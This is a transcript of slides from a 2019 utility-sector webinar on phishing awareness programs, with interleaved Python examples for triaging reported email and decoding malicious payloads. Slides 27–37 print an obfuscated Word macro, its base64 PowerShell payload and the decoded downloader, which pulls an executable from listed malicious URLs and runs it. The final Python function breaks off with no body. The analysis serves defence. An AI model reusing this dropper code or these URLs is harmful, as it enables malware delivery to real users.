MRO Security Advisory Council (SAC) Webinar A Tale of Two Phishing - - PowerPoint PPT Presentation



SLIDE 1

MRO Security Advisory Council (SAC) Webinar

“A Tale of Two Phishing Programs”

Seth Bross, Enterprise Security Analyst, OGE Energy Corporation; Tammy Retzlaff, Consultant Information Security Analyst, American Transmission Company; Jamie Arndt, Senior Cyber Security Engineer, American Transmission Company

July 11, 2019

SLIDE 2

A Tale of Two Phishing Programs

MRO Presentation July 11, 2019

SLIDE 3

atcllc.com

ATC – Phishing Program

Tammy Retzlaff, CISSP, CISM, CRISC
Information Security Analyst

SLIDE 4

Who We Are

  • ATC was founded in 2001 as a transmission-only utility serving the Upper Peninsula of Michigan, the eastern half of Wisconsin, and a small portion of Illinois.
  • We manage almost 10,000 miles of high-voltage transmission lines and 568 substations.
  • We have approximately 600 employees and 1800+/- contractors.

SLIDE 5

Where We’ve Been

In 2012 malicious email attacks were increasing almost daily…

  – Employees unaware of the risk
  – Leaders unaware of the risk
  – No easy way to report suspected phishing emails
  – Email investigations difficult and time consuming

  • We knew we needed to do something …

SLIDE 6

How We Started

  • Looked for ways to train our employees on the dangers of phishing
  • Decided on the good behaviors we wanted to reinforce
  • Researched tools that were out there to help us
  • Gained buy-in from leaders

SLIDE 7

The Journey

  • 2012 – purchased a tool to help us “phish” our employees
  • 2013 – began running Monthly Scenarios
    – Immediate Education
    – Easy ways to report
    – Focus on Good behaviors – report, report, report
  • 2016 – Assessed the program from a Human Performance standpoint
  • 2017 – Corporate Goal – tied to bonus
  • 2018 – Made improvements to the program
    – In person conversations for repeat clickers
    – Retest for individuals who fell for the phish

SLIDE 8

Where We Are Today

  • Read and discuss opportunity for all employees
  • Quarterly prize drawings for reporters
  • Depts challenge each other
  • “Leader Board”
  • Catalyst to talk about security across the organization

SLIDE 9

Trends

Reporting of phishing scenarios is trending upward. Clicking on phishing scenarios is trending downward.

SLIDE 10

Where We’re Going

  • Increasing difficulty of scenarios
  • Targeted scenarios in addition to monthly
  • Tighter tie-in with Human Performance

SLIDE 11

Lessons Learned

  • Leadership support of the program is key in its success
  • Focusing on positive behaviors gets better buy-in than focusing on negative behaviors
  • Partner with as many people in the organization as possible
  • Deliver your message in person as often as possible
  • Reinforce your message as often as possible

SLIDE 12

Internal Phishing Program

Seth Bross, CISSP
Systems Security Analyst

SLIDE 13

Company Overview

  • Founded in 1902
  • Around 3000 active members
  • Our company works the entire electric stack from generation and transmission to distribution.

SLIDE 14

Phishing Program Overview

  • Every Member receives a simulated phishing email once a month
  • Training is provided in cases where a member falls for a simulated phishing email.
  • Training is provided through our phishing/training vendor automatically
  • Simulated phishing emails are from the vendor based on real phishing emails
  • All suspect emails reported are run through an automated verification system and responded to.

SLIDE 15

Benefits

  • Increased awareness of the types of emails that are phishy
  • More contact between the business and Security
  • Training can be provided immediately and can be tailored to issues
  • Reduce phishing attack surface
  • Increased contact with security

SLIDE 16

Automated Response to Submitted emails

  • By utilizing SOAR we have been able to reduce the man hours needed to respond to emails drastically.
  • Increased reporting capabilities
  • More insight into the effectiveness of our tools
  • The SOAR platform allows for some automated analysis that would normally require manual examination.
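Slides 14 and 16 describe running every user-reported email through an automated verification step before a response goes back to the reporter. The Python below is an added example of what that first pass can look like; it is not the presenters' or their vendor's code. The sample message, the three checks it runs (visible link text whose host differs from the href host, a URL that carries an email address as a parameter, as in the slide 25 sample, and a macro-enabled attachment) and the verdict wording are all constructed for this illustration.

```python
"""First-pass automated triage of a user-reported email: parse the .eml, pull out
URLs and attachments, and record the checks a SOAR playbook would run before a
verdict is sent back to the reporter.  Added example, not the presenters' or any
vendor's code; the sample message, the findings and the verdict wording are
constructed for this illustration."""
import email
import hashlib
import re
from email import policy
from email.message import EmailMessage
from urllib.parse import parse_qs, urlsplit

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
ANCHOR_RE = re.compile(r'<a[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
MACRO_EXTENSIONS = (".docm", ".xlsm", ".pptm")


def build_sample_report() -> bytes:
    """Constructed sample of a reported message (no real sender, host or file):
    a link whose visible text disagrees with its href, a URL carrying the
    recipient's address as a parameter, and a macro-enabled attachment."""
    msg = EmailMessage()
    msg["From"] = "Payroll <payroll@example.invalid>"
    msg["To"] = "user@example.test"
    msg["Subject"] = "Action required: updated direct deposit form"
    msg.set_content(
        "Please confirm your details at\n"
        "https://example.invalid/server/?email=user@example.test\n"
    )
    msg.add_alternative(
        "<p>Please confirm your details at\n"
        '<a href="http://login.example.invalid/server/?email=user@example.test">'
        "https://hr.example.test/forms</a></p>\n",
        subtype="html",
    )
    msg.add_attachment(
        b"PK\x03\x04 constructed placeholder, not a real document",
        maintype="application",
        subtype="vnd.ms-word.document.macroEnabled.12",
        filename="DirectDeposit.docm",
    )
    return bytes(msg)


def triage(raw: bytes) -> dict:
    """Return URLs, attachment hashes, findings and a verdict for one reported email."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings, urls, attachments = [], set(), []
    for part in msg.walk():
        if part.is_attachment():
            data = part.get_payload(decode=True) or b""
            name = part.get_filename() or "<unnamed>"
            attachments.append({"name": name, "size": len(data),
                                "sha256": hashlib.sha256(data).hexdigest()})
            if name.lower().endswith(MACRO_EXTENSIONS):
                findings.append(f"macro-enabled attachment: {name}")
            continue
        ctype = part.get_content_type()
        if ctype not in ("text/plain", "text/html"):
            continue                      # skip multipart containers
        body = part.get_content()
        urls.update(URL_RE.findall(body))
        if ctype == "text/html":
            # Visible link text that is itself a URL but points somewhere else.
            for href, inner in ANCHOR_RE.findall(body):
                shown = re.sub(r"<[^>]+>", "", inner).strip()
                if shown.startswith("http"):
                    shown_host = urlsplit(shown).hostname
                    real_host = urlsplit(href).hostname
                    if shown_host != real_host:
                        findings.append(
                            f"link text shows {shown_host} but points to {real_host}")
    for url in sorted(urls):
        # Recipient address embedded in the query string (tracking who clicked).
        params = parse_qs(urlsplit(url).query)
        if any("@" in v for values in params.values() for v in values):
            findings.append(f"URL carries an email address as a parameter: {url}")
    verdict = "suspicious" if findings else "no automated findings"
    return {"subject": str(msg["Subject"]), "urls": sorted(urls),
            "attachments": attachments, "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    result = triage(build_sample_report())
    print(result["verdict"])
    for finding in result["findings"]:
        print(" -", finding)
```

The attachment hash is recorded so the same playbook can hand it to a sandbox or reputation lookup (slides 38 through 41) without re-parsing the message; the findings list, not a single score, is what gets written back to the reporter and the ticket.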

SLIDE 17

Forward Outlook

  • SOAR (Security Orchestration, Automation and Response) improvements
  • Increase the ability to integrate tools and use external input to increase automated response.
  • Reduce time needed to analyze and respond to emails
  • Further integrations with SOAR tools, email servers and End Point Protection Tools

SLIDE 18

Lessons Learned

  • Some people will feel “Tricked” when they fail a test and it can result in non-productive interactions.
  • Messaging must go out early and frequently to allow time for employees to understand the purpose of the tests and how they are used.
  • Make sure that the security tests are not used as a stick but as a training opportunity
  • Automate early, automate often

SLIDE 19

18

Simulated Phishing Email Example

SLIDE 20

19

Detection Evasion

SLIDE 21

20

Detection Evasion

SLIDE 22

21

Detection Evasion

SLIDE 23

ATC – Manual Investigation

Jamie Arndt
Senior Cybersecurity Engineer

SLIDE 24

Spam

SLIDE 25

Malicious URLs

http://www.puynag-china.com/server/?email=[email here]

SLIDE 26

Malicious Documents

https://luxur.club/wp-content/25ke-t65cr-eczyfts

SLIDE 27

Obfuscated macros

Sub autoopen()
On Error Resume Next
<snip>
jQ1AA14 = (NoBUxo / Log(i1o1_wDG) - CXA_QU * Oct(177462578) - fC_4AoA - Log(bAAABA - MAw1XQUA / WQkAZ1 - 258583782))
End If
l_DDCAU (jAUUBx + "po" + FADAUk_ + "wersh" + QAAADDA + "ell -e " + YAGAAAQx + UAAcQACc + fACABAAX + dDZBAQoc + U4cADAxA + u_DAAGA)
If YQUw_U = UBoABkAk Then
lAxAAAC = 210690210 * Round(342763755) / wDUoQAUB - Tan(557511061 + UADAAAZ) * 370351941 + Hex(304503937 + CSng(oBAkAUA))
<snip>
End Sub

SLIDE 29

l_DDCAU (jAUUBx + "po" + FADAUk_ + "wersh" + QAAADDA + "ell -e " + YAGAAAQx + UAAcQACc + fACABAAX + dDZBAQoc + U4cADAxA + u_DAAGA)

Function dDZBAQoc()
<snip>
SAAAkQAC = "LgAoACAAKABbAFMAVAByAGkAb . . ."
<snip>
bwcQAAAA = "tAGoATwBpAE4AJwAnACkAKAAgA . . ."
<snip>
dDZBAQoc = SAAAkQAC + bwcQAAAA + BAwAAoCA + . . .
End Function

SLIDE 30

All pieced together

powershell -e LgAoACAAKABbAFMAVAByAGkAbgBHAF0AJABWAGUAcgBCAG8AcwBFAFAAUgBlAEYAZQBSAGUAbgBDAGUAKQBbADEALAAzAF0AKwAnAFgAJwAtAGoATwBp AE4AJwAnACkAKAAgAE4AZQBXAC0ATwBCAEoARQBjAHQAIAAgAHMAWQBTAFQARQBtAC4ASQBvAC4AQwBPAG0AUABSAGUAUwBzAGkATwBOAC4ARABFAEYA bABhAFQAZQBzAHQAUgBFAGEATQAoAFsASQBPAC4ATQBFAE0AbwByAHkAUwB0AFIARQBhAG0AXQBbAHMAeQBTAFQAZQBNAC4AYwBPAE4AdgBlAFIAVABd ADoAOgBmAFIAbwBNAEIAQQBzAGUANgA0AHMAdABSAEkATgBnACgAKAAnAFgAVgBMAFIAYQAnACsAJwB0AHMAJwArACcAdwBGAFAAMABWAFAAeAAnACsA JwBpAFUAawAnACsAJwBFAFYASwAnACsAJwBSADIAJwArACcARwAnACsAJwBoAHgAJwArACcAdABDACcAKwAnAHIAJwArACcAbQAnACsAJwBJAFgAcwBv AGMAUAAnACsAJwBiAGgAJwArACcASQBzAFoAJwArACcAQgBFACcAKwAnAFcAKwBTAFQAUQA3ACcAKwAnAGsAaQBjAHIAJwArACcAYwAnACsAJwBkAHEA UQBmADUAOQBTACcAKwAnADIAbQBhAGIASABpADYANgA0AHQAeAB6ACcAKwAnAGoAJwArACcAbwA0ACcAKwAnAFUANQAnACsAJwAwAEwATQB4ACcAKwAn AFAAJwArACcASwBZACcAKwAnAGsAJwArACcAbgBWADIAQwAvADEAcwBTAFoASgA0AEIAWABQACcAKwAnAFIAbAAnACsAJwA1ACcAKwAnAEMAJwArACcA bgAnACsAJwBCACcAKwAnAHYAdQB4AFgAJwArACcAZgAxAEMANQBhAE0ASAA5AEwAVAAnACsAJwBBADEAYQB6AFIAYQBIAHcAUwAnACsAJwBhADgAaABM ACcAKwAnAFkAJwArACcAUwBFAGwAVwArAC8AJwArACcAYgAnACsAJwBPACcAKwAnADgAYQBrAFUAdAAnACsAJwBoACcAKwAnADEAJwArACcAcgBRAHUA RgAnACsAJwB1ACcAKwAnAHEAcQAnACsAJwBUAHIAcABhAE8ASwAnACsAJwByAHQAagBmAFQAdABXADEAJwArACcAdgBnAHcAeABLACcAKwAnAFoAVgB6 ACcAKwAnAGUANQBmADgAYQB2AEcAYgBxAGoAJwArACcAMABSADIAMgAnACsAJwBvAFUAJwArACcAaABlACcAKwAnAFEAcgBIAGIAYQBzAEcATAAnACsA JwA2AGcATwArAFkAJwArACcAdwBFAGwAMwAnACsAJwB1ACcAKwAnAHQATQBIACcAKwAnAGUAJwArACcAVwBHACcAKwAnAGkAKwBJAEwAJwArACcAVABS AGoAWAAnACsAJwA3AEMAagBzADIAJwArACcASwB5AFoAWABOAHUAdABNACcAKwAnAHIAVgBXACcAKwAnAE4AcgBxAE8AMQAzACcAKwAnAFEAYwA1AFYA KwBIAGgAZgAnACsAJwAvADEAOQAyADEAaABaAGQAYQAnACsAJwB5AC8AJwArACcAYQBRACcAKwAnADUALwAnACsAJwBHAFoARgBxAEsAOQAwAHoAMABx ACcAKwAnAGMASgBiAFIAJwArACcAdQAyAGsAJwArACcAUQAwADYATAAnACsAJwBkACcAKwAnAG0AUAAnACsAJwBiACcAKwAnAHgAdABHADYAJwArACcA 
UABlADIAMAAnACsAJwBYADUAJwArACcAQQA3ACcAKwAnAHMAawB3AGkAWgArAHoATwBvACcAKwAnAE4AbAB5AEEAbQA0ADQARAAnACsAJwBiAEUAdABB ADMAJwArACcASgAnACsAJwBaAFMASgAnACsAJwBLACcAKwAnAEkAJwArACcAegBMADkAOQAnACsAJwBEAEgAMABpAHgAdgBnACcAKwAnAGoAeQBXADMA JwArACcASwBmACcAKwAnAGsAJwArACcAaQBZAEEAawBxAEUAKwBIACcAKwAnAHcASwA1ACcAKwAnAFEAMQBoACcAKwAnAEsAQgBpAE4ASQBlADcAZgAn ACsAJwBZACcAKwAnAGUAdQBkACcAKwAnAFgAYQAnACsAJwB0ACcAKwAnAEcAJwArACcAeAB5AFIAJwArACcAbgAyAFQAJwArACcAMABTACcAKwAnAGoA RQAnACsAJwBpACcAKwAnAEYAJwArACcASQA5AEkAawByAFYAMQAnACsAJwBHAE4AdwBNAFkAJwArACcAZwBYAEEAWQBYADcAawAnACsAJwBrAFQAJwAr ACcAYgBSAFcAJwArACcAOQBUACcAKwAnAEQAawAzACcAKwAnAGQAUAAnACsAJwBwAC8AZQAnACsAJwAzAG8AWgBuACcAKwAnAHQAegBlAFUAKwBuAHcA UABaAGQAZQAnACsAJwBKAEQAJwArACcAOQBLACcAKwAnAFoANABjAFEAdwB6ACcAKwAnAFgAJwArACcAdgAnACsAJwBLAFUATABQAEkAZQAnACsAJwBs AG0AVQBPAEoARgAnACsAJwBtAHMAbwAnACsAJwA4AEYAZwBqAG4ANgA4ADgATABpADcAUQBtACcAKwAnAG0AJwArACcARAAnACsAJwBaAHUATwAzADAA WABpACcAKwAnAEQAMABlADAAawByAEcARgAwACcAKwAnAFcAJwArACcAcABpAEQAcgBmACcAKwAnAEYAZgBZAEIAJwArACcATAAvACcAKwAnADUAcgB3 AE0AJwArACcALwB5AFEAbABMAFIAYwBBACcAKwAnAE8AVQAnACsAJwBsAFcAJwArACcAdwBYACcAKwAnAEsAJwArACcAZABuAE0AOQBLACcAKwAnAGUA cgAnACsAJwBVADkAbgAnACsAJwBjADkAeABBACcAKwAnAFgAawAnACsAJwBHACcAKwAnAEEAQwBJAGwAUgBhAGgAaABTADUASQAnACsAJwAvACcAKQAg ACkAIAAsACAAWwBpAE8ALgBDAG8ATQBwAHIAZQBzAHMASQBvAG4ALgBjAG8AbQBQAHIAZQBTAHMASQBvAG4ATQBPAGQARQBdADoAOgBkAEUAQwBvAG0A cABSAEUAcwBTACkAIAB8AEYAbwByAEUAYQBjAGgAIAB7ACAATgBlAFcALQBPAEIASgBFAGMAdAAgAGkATwAuAHMAVABSAGUAQQBNAHIAZQBBAGQARQBy ACgAIAAkAF8AIAAsAFsAUwB5AFMAdABFAG0ALgBUAGUAWABUAC4ARQBuAEMATwBkAEkATgBHAF0AOgA6AEEAcwBjAGkASQAgACkAIAB9ACkALgByAGUA QQBEAFQATwBFAG4ARAAoACAAKQA=

SLIDE 31

CyberChef (gchq.github.io)

SLIDE 32

..(. .(.[.S.T.r.i.n.G.].$.V.e.r.B.o.s.E.P.R.e.F.e.R.e.n.C.e.).[.1.,.3.].+.'.X.'.-.j.O.i.N.'.'.).(. .N.e.W.-.O.B.J.E.c.t. . .s.Y.S.T.E.m...I.o...C.O.m.P.R.e.S.s.i.O.N...D.E.F.l.a.T.e.s.t.R.E.a.M.(.[.I.O...M.E.M.o .r.y.S.t.R.E.a.m.].[.s.y.S.T.e.M...c.O.N.v.e.R.T.].:.:.f.R.o.M.B.A.s.e.6.4.s.t.R.I.N.g.(.(.'. X.V.L.R.a.'.+.'.t.s.'.+.'.w.F.P.0.V.P.x.'.+.'.i.U.k.'.+.'.E.V.K.'.+.'.R.2.'.+.'.G.'.+.'.h.x.'.+.'.t.C .'.+.'.r.'.+.'.m.'.+.'.I.X.s.o.c.P.'.+.'.b.h.'.+.'.I.s.Z.'.+.'.B.E.'.+.'.W.+.S.T.Q.7.'.+.'.k.i.c.r.'.+.'. c.'.+.'.d.q.Q.f.5.9.S.'.+.'.2.m.a.b.H.i.6.6.4.t.x.z.'.+.'.j.'.+.'.o.4.'.+.'.U.5.'.+.'.0.L.M.x.'.+.'. P.'.+.'.K.Y.'.+.'.k.'.+.'.n.V.2.C./.1.s.S.Z.J.4.B.X.P.'.+.'.R.l.'.+.'.5.'.+.'.C.'.+.'.n.'.+.'.B.'.+.'. v.u.x.X.'.+.'.f.1.C.5.a.M.H.9.L.T.'.+.'.A.1.a.z.R.a.H.w.S.'.+.'.a.8.h.L.'.+.'.Y.'.+.'.S.E.l.W. +./.'.+.'.b.'.+.'.O.'.+.'.8.a.k.U.t.'.+.'.h.'.+.'.1.'.+.'.r.Q.u.F.'.+.'.u.'.+.'.q.q.'.+.'.T.r.p.a.O.K.'.+ .'.r.t.j.f.T.t.W.1.'.+.'.v.g.w.x.K.'.+.'.Z.V.z.'.+.'.e.5.f.8.a.v.G.b.q.j.'.+.'.0.R.2.2.'.+.'.o.U.'.+.'. h.e.'.+.'.Q.r.H.b.a.s.G.L.'.+.'.6.g.O.+.Y.'.+.'.w.E.l.3.'.+.'.u.'.+.'.t.M.H.'.+.'.e.'.+.'.W.G.'.+.' .i.+.I.L.'.+.'.T.R.j.X.'.+.'.7.C.j.s.2.'.+.'.K.y.Z.X.N.u.t.M.'.+.'.r.V.W.'.+.'.N.r.q.O.1.3.'.+.'.Q. c.5.V.+.H.h.f.'.+.'./.1.9.2.1.h.Z.d.a.'.+.'.y./.'.+.'.a.Q.'.+.'.5./.'.+.'.G.Z.F.q.K.9.0.z.0.q.'.+.'. c.J.b.R.'.+.'.u.2.k.'.+.'.Q.0.6.L.'.+.'.d.'.+.'.m.P.'.+.'.b.'.+.'.x.t.G.6.'.+.'.P.e.2.0.'.+.'.X.5.'.+ .'.A.7.'.+.'.s.k.w.i.Z.+.z.O.o.'.+.'.N.l.y.A.m.4.4.D.'.+.'.b.E.t.A.3.'.+.'.J.'.+.'.Z.S.J.'.+.'.K.'. +.'.I.'.+.'.z.L.9.9.'.+.'.D.H.0.i.x.v.g.'.+.'.j.y.W.3.'.+.'.K.f.'.+.'.k.'.+.'.i.Y.A.k.q.E.+.H.'.+.'.w. K.5.'.+.'.Q.1.h.'.+.'.K.B.i.N.I.e.7.f.'.+.'.Y.'.+.'.e.u.d.'.+.'.X.a.'.+.'.t.'.+.'.G.'.+.'.x.y.R.'.+.'.n. 2.T.'.+.'.0.S.'.+.'.j.E.'.+.'.i.'.+.'.F.'.+.'.I.9.I.k.r.V.1.'.+.'.G.N.w.M.Y.'.+.'.g.X.A.Y.X.7.k.'.+.'. 
k.T.'.+.'.b.R.W.'.+.'.9.T.'.+.'.D.k.3.'.+.'.d.P.'.+.'.p./.e.'.+.'.3.o.Z.n.'.+.'.t.z.e.U.+.n.w.P.Z.d .e.'.+.'.J.D.'.+.'.9.K.'.+.'.Z.4.c.Q.w.z.'.+.'.X.'.+.'.v.'.+.'.K.U.L.P.I.e.'.+.'.l.m.U.O.J.F.'.+.'. m.s.o.'.+.'.8.F.g.j.n.6.8.8.L.i.7.Q.m.'.+.'.m.'.+.'.D.'.+.'.Z.u.O.3.0.X.i.'.+.'.D.0.e.0.k.r.G.F .0.'.+.'.W.'.+.'.p.i.D.r.f.'.+.'.F.f.Y.B.'.+.'.L./.'.+.'.5.r.w.M.'.+.'./.y.Q.l.L.R.c.A.'.+.'.O.U.'.+.'.l .W.'.+.'.w.X.'.+.'.K.'.+.'.d.n.M.9.K.'.+.'.e.r.'.+.'.U.9.n.'.+.'.c.9.x.A.'.+.'.X.k.'.+.'.G.'.+.'.A.C .I.l.R.a.h.h.S.5.I.'.+.'./.'.). .). .,. .[.i.O...C.o.M.p.r.e.s.s.I.o.n...c.o.m.P.r.e.S.s.I.o.n.M.O.d.E.].:.:.d.E.C.o.m.p.R.E.s.S.). .|.F.o.r.E.a.c.h. .{. .N.e.W.-.O.B.J.E.c.t. .i.O...s.T.R.e.A.M.r.e.A.d.E.r.(. .$._. .,.[.S.y.S.t.E.m...T.e.X.T...E.n.C.O.d.I.N.G.].:.:.A.s.c.i.I. .). .}.)...r.e.A.D.T.O.E.n.D.(. .).

CyberChef Recipe

  • From Base64
  • Remove null bytes

SLIDE 33

.( ([STrinG]$VerBosEPReFeRenCe)[1,3]+'X'-jOiN'')( NeW- OBJEct sYSTEm.Io.COmPReSsiON.DEFlaTestREaM([IO.MEMorySt REam][sySTeM.cONveRT]::fRoMBAse64stRINg(('XVLRa'+'t s'+'wFP0VPx'+'iUk'+'EVK'+'R2'+'G'+'hx'+'tC'+'r'+'m'+'IXsocP' +'bh'+'IsZ'+'BE'+'W+STQ7'+'kicr'+'c'+'dqQf59S'+'2mabHi664t xz'+'j'+'o4'+'U5'+'0LMx'+'P'+'KY'+'k'+'nV2C/1sSZJ4BXP'+'Rl' +'5'+'C'+'n'+'B'+'vuxX'+'f1C5aMH9LT'+'A1azRaHwS'+'a8hL'+' Y'+'SElW+/'+'b'+'O'+'8akUt'+'h'+'1'+'rQuF'+'u'+'qq'+'TrpaOK'+ 'rtjfTtW1'+'vgwxK'+'ZVz'+'e5f8avGbqj'+'0R22'+'oU'+'he'+'QrH basGL'+'6gO+Y'+'wEl3'+'u'+'tMH'+'e'+'WG'+'i+IL'+'TRjX'+'7Cj s2'+'KyZXNutM'+'rVW'+'NrqO13'+'Qc5V+Hhf'+'/1921hZda'+'y /'+'aQ'+'5/'+'GZFqK90z0q'+'cJbR'+'u2k'+'Q06L'+'d'+'mP'+'b'+' xtG6'+'Pe20'+'X5'+'A7'+'skwiZ+zOo'+'NlyAm44D'+'bEtA3'+'J' +'ZSJ'+'K'+'I'+'zL99'+'DH0ixvg'+'jyW3'+'Kf'+'k'+'iYAkqE+H'+'w K5'+'Q1h'+'KBiNIe7f'+'Y'+'eud'+'Xa'+'t'+'G'+'xyR'+'n2T'+'0S'+' jE'+'i'+'F'+'I9IkrV1'+'GNwMY'+'gXAYX7k'+'kT'+'bRW'+'9T'+'D k3'+'dP'+'p/e'+'3oZn'+'tzeU+nwPZde'+'JD'+'9K'+'Z4cQwz'+'X' +'v'+'KULPIe'+'lmUOJF'+'mso'+'8Fgjn688Li7Qm'+'m'+'D'+'Zu O30Xi'+'D0e0krGF0'+'W'+'piDrf'+'FfYB'+'L/'+'5rwM'+'/yQlLRc A'+'OU'+'lW'+'wX'+'K'+'dnM9K'+'er'+'U9n'+'c9xA'+'Xk'+'G'+'A CIlRahhS5I'+'/') ) , [iO.CoMpressIon.comPreSsIonMOdE]::dECompREsS) |ForEach { NeW-OBJEct iO.sTReAMreAdEr( $_ ,[SyStEm.TeXT.EnCOdING]::AsciI ) }).reADTOEnD( )

CyberChef Recipe

  • From Base64
  • Remove null bytes
  • Find / Replace ‘+’

SLIDE 34

.( ([STrinG]$VerBosEPReFeRenCe)[1,3]+'X'-jOiN'')( NeW- OBJEct sYSTEm.Io.COmPReSsiON.DEFlaTestREaM([IO.MEMor yStREam][sySTeM.cONveRT]::fRoMBAse64stRINg(('XVL RatswFP0VPxiUkEVKR2GhxtCrmIXsocPbhIsZBEW+ST Q7kicrcdqQf59S2mabHi664txzjo4U50LMxPKYknV2C/1s SZJ4BXPRl5CnBvuxXf1C5aMH9LTA1azRaHwSa8hLYSE lW+/bO8akUth1rQuFuqqTrpaOKrtjfTtW1vgwxKZVze5f8av Gbqj0R22oUheQrHbasGL6gO+YwEl3utMHeWGi+ILTRjX 7Cjs2KyZXNutMrVWNrqO13Qc5V+Hhf/1921hZday/aQ5/ GZFqK90z0qcJbRu2kQ06LdmPbxtG6Pe20X5A7skwiZ+z OoNlyAm44DbEtA3JZSJKIzL99DH0ixvgjyW3KfkiYAkqE+ HwK5Q1hKBiNIe7fYeudXatGxyRn2T0SjEiFI9IkrV1GNwM YgXAYX7kkTbRW9TDk3dPp/e3oZntzeU+nwPZdeJD9KZ 4cQwzXvKULPIelmUOJFmso8Fgjn688Li7QmmDZuO30X iD0e0krGF0WpiDrfFfYBL/5rwM/yQlLRcAOUlWwXKdnM9 KerU9nc9xAXkGACIlRahhS5I/') ) , [iO.CoMpressIon.comPreSsIonMOdE]::dECompREsS) |ForEach { NeW-OBJEct iO.sTReAMreAdEr( $_ ,[SyStEm.TeXT.EnCOdING]::AsciI ) }).reADTOEnD( )

CyberChef Recipe

  • From Base64
  • Remove null bytes
  • Find / Replace ‘+’

SLIDE 35

.( ([STrinG]$VerBosEPReFeRenCe)[1,3]+'X'-jOiN'')( NeW- OBJEct sYSTEm.Io.COmPReSsiON.DEFlaTestREaM([IO.MEMo ryStREam][sySTeM.cONveRT]::fRoMBAse64stRINg((' XVLRatswFP0VPxiUkEVKR2GhxtCrmIXsocPbhIsZBEW+ STQ7kicrcdqQf59S2mabHi664txzjo4U50LMxPKYknV2C/ 1sSZJ4BXPRl5CnBvuxXf1C5aMH9LTA1azRaHwSa8hLY SElW+/bO8akUth1rQuFuqqTrpaOKrtjfTtW1vgwxKZVze5f 8avGbqj0R22oUheQrHbasGL6gO+YwEl3utMHeWGi+ILT RjX7Cjs2KyZXNutMrVWNrqO13Qc5V+Hhf/1921hZday/a Q5/GZFqK90z0qcJbRu2kQ06LdmPbxtG6Pe20X5A7skwi Z+zOoNlyAm44DbEtA3JZSJKIzL99DH0ixvgjyW3KfkiYAk qE+HwK5Q1hKBiNIe7fYeudXatGxyRn2T0SjEiFI9IkrV1G NwMYgXAYX7kkTbRW9TDk3dPp/e3oZntzeU+nwPZdeJ D9KZ4cQwzXvKULPIelmUOJFmso8Fgjn688Li7QmmDZu O30XiD0e0krGF0WpiDrfFfYBL/5rwM/yQlLRcAOUlWwXK dnM9KerU9nc9xAXkGACIlRahhS5I/') ) , [iO.CoMpressIon.comPreSsIonMOdE]::dECompREsS) |ForEach { NeW-OBJEct iO.sTReAMreAdEr( $_ ,[SyStEm.TeXT.EnCOdING]::AsciI ) }).reADTOEnD( )

CyberChef Recipe

  • From Base64
  • Remove null bytes
  • Find / Replace ‘+’

Round 2

  • From Base64
  • Raw Inflate

SLIDE 36

$QUUCU_x='fD4AwC_';$bAGUwZAQ=new-object Net.WebClient;$iAQZUoA='http://accesspress.rdsarkar.com/wp-content/8dk/@http://blog.atxin.cc/wp-admin/W8Ne/@http://acc.misiva.com.ec/wp-includes/CW0/@http://bornkickers.kounterdev.com/wp-content/uploads/w1lv/@http://blacharze.y0.pl/galeria/TRg/'.Split('@');$zDkDA_='fABUBo';$hUUCDU = '872';$I1ABXZBo='JUA_AcDU';$OAZkAoA=$env:userprofile+'\'+$hUUCDU+'.exe';foreach($cAABAGxB in $iAQZUoA){try{$bAGUwZAQ.DownloadFile($cAABAGxB, $OAZkAoA);$zACBZB='IQwA_ZQA';If ((Get-Item $OAZkAoA).length -ge 40000) {Invoke-Item $OAZkAoA;$qBBZD4A='pBUAAQ';break;}}catch{}}$WAQDAAAU='WAAUDAA';

CyberChef Recipe

  • From Base64
  • Remove null bytes
  • Find / Replace ‘+’

Round 2

  • From Base64
  • Raw Inflate

SLIDE 37

$QUUCU_x='fD4AwC_';
$bAGUwZAQ=new-object Net.WebClient;
$iAQZUoA='http://accesspress.rdsarkar.com/wp-content/8dk/@http://blog.atxin.cc/wp-admin/W8Ne/@http://acc.misiva.com.ec/wp-includes/CW0/@http://bornkickers.kounterdev.com/wp-content/uploads/w1lv/@http://blacharze.y0.pl/galeria/TRg/'.Split('@');
$zDkDA_='fABUBo';
$hUUCDU = '872';
$I1ABXZBo='JUA_AcDU';
$OAZkAoA=$env:userprofile+'\'+$hUUCDU+'.exe';
foreach($cAABAGxB in $iAQZUoA){
  try {
    $bAGUwZAQ.DownloadFile($cAABAGxB, $OAZkAoA);
    $zACBZB='IQwA_ZQA';
    If ((Get-Item $OAZkAoA).length -ge 40000){
      Invoke-Item $OAZkAoA;
      $qBBZD4A='pBUAAQ';
      break;
    }
  } catch{}
};
$WAQDAAAU='WAAUDAA';
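The recipe on slides 32 through 36 (From Base64, Remove null bytes, Find / Replace ‘+’, then a second round of From Base64 and Raw Inflate) is worth scripting so the same decoding can run inside the SOAR playbook instead of by hand in CyberChef. The Python below is an added example, not the presenters' code: build_encoded_command is a constructed helper that turns a placeholder stage-2 script (hosts under .invalid and .test, so nothing in it is a real indicator) into input of the same shape as the slide 30 command, purely to give the decoder something to work on; the indicator table is an assumption of this example, drawn from the behaviours visible in the slide 37 script (WebClient download, URL list split on '@', drop path under the user profile, size check, Invoke-Item).

```python
"""Reproduce the CyberChef recipe from the slides in Python and flag what the
decoded script does.  Round 1: From Base64, Remove null bytes, Find/Replace
'+'.  Round 2: From Base64, Raw Inflate.  Added example, not the presenters'
code; the stage-2 text, the builder that wraps it and the indicator list are
constructed for this illustration and use placeholder hosts only."""
import base64
import re
import zlib

# Constructed stand-in for the decompressed downloader: same shape as the
# slide (WebClient, URL list split on '@', drop path under the user profile,
# size check before Invoke-Item) but with .invalid/.test hosts, not real IoCs.
SAMPLE_STAGE2 = (
    "$c=new-object Net.WebClient;"
    "$u='http://example.invalid/a/@http://example.test/b/'.Split('@');"
    "$p=$env:userprofile+'\\'+'872'+'.exe';"
    "foreach($x in $u){try{$c.DownloadFile($x,$p);"
    "If ((Get-Item $p).length -ge 40000){Invoke-Item $p;break;}}catch{}}"
)

# Indicator names and patterns are an assumption of this example, not a
# published detection rule.
INDICATORS = {
    "WebClient download": r"Net\.WebClient|DownloadFile",
    "URL list split on '@'": r"\.Split\('@'\)",
    "drop path under user profile": r"\$env:userprofile",
    "size check before execution": r"\.length\s+-ge\s+\d+",
    "execution of dropped file": r"Invoke-Item",
}


def build_encoded_command(stage2: str) -> str:
    """Inverse of the recipe, used only to make test input shaped like the
    slides: raw-deflate, base64, split into '+'-joined quoted chunks, wrap in
    the DeflateStream/StreamReader expression, then UTF-16LE + base64 for -e."""
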